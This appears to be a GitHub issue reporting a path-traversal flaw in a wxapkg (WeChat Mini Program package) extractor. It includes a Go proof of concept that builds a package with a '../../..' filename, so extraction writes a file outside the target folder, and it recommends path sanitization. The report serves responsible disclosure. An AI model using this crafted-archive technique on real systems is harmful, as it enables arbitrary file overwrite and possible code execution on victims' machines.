Skip to content

Malicious wxapkg File Leading to Arbitrary File Write and Command Execution #85

New issue
New issue
Open
Open
Malicious wxapkg File Leading to Arbitrary File Write and Command Execution#85
@ac0d3r

Description

@ac0d3r
ac0d3r
opened on May 9, 2025

Vulnerability Report: Malicious wxapkg File Leading to Arbitrary File Write and Command Execution

Summary:

A vulnerability was discovered in the handling of wxapkg files (WeChat Mini Program package format). By crafting a malicious wxapkg file, an attacker can exploit improper validation during package parsing and extraction. This leads to arbitrary file write on the host file system and can be further escalated to remote command execution under certain conditions.

Vulnerability Details:

  • Affected Component: wxapkg file parsing and extraction logic
  • Type of Vulnerability: Arbitrary File Write, Command Execution
  • Attack Vector: Malicious wxapkg file

Proof of Concept (PoC):

A proof-of-concept wxapkg file was crafted containing:

package unpack

import (
	"bytes"
	"encoding/binary"
	"testing"
)

func createTestWxapkg() []byte {
	var buf bytes.Buffer

	// header
	buf.WriteByte(0xBE)

	binary.Write(&buf, binary.BigEndian, uint32(0))

	indexLenPos := buf.Len()
	binary.Write(&buf, binary.BigEndian, uint32(0)) // indexInfoLength
	binary.Write(&buf, binary.BigEndian, uint32(0)) // bodyInfoLength

	buf.WriteByte(0xED)

	// files
	// files number
	binary.Write(&buf, binary.BigEndian, uint32(1))

	indexStart := buf.Len()

	filename := "../../../../../../../../Users/whoami/Desktop/zznq.txt"
	fileContent := []byte("zznq todo")

	binary.Write(&buf, binary.BigEndian, uint32(len(filename)))
	buf.WriteString(filename)

	dataOffsetPos := buf.Len()
	binary.Write(&buf, binary.BigEndian, uint32(0))
	binary.Write(&buf, binary.BigEndian, uint32(len(fileContent)))

	b := buf.Bytes()
	binary.BigEndian.PutUint32(b[indexLenPos:], uint32(buf.Len()-indexStart))
	binary.BigEndian.PutUint32(b[indexLenPos+4:], uint32(len(fileContent)))

	// data body
	fileDataPos := buf.Len()
	buf.Write(fileContent)

	b = buf.Bytes()
	binary.BigEndian.PutUint32(b[dataOffsetPos:], uint32(fileDataPos))

	return buf.Bytes()
}

func TestUnPack(t *testing.T) {
	data := createTestWxapkg()
	t.Log(UnpackWxapkg(data, "./"))
}

Image

Recommendations:

  • Implement strict path sanitization when extracting wxapkg files:unpack.go#L179

Severity: Critical

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions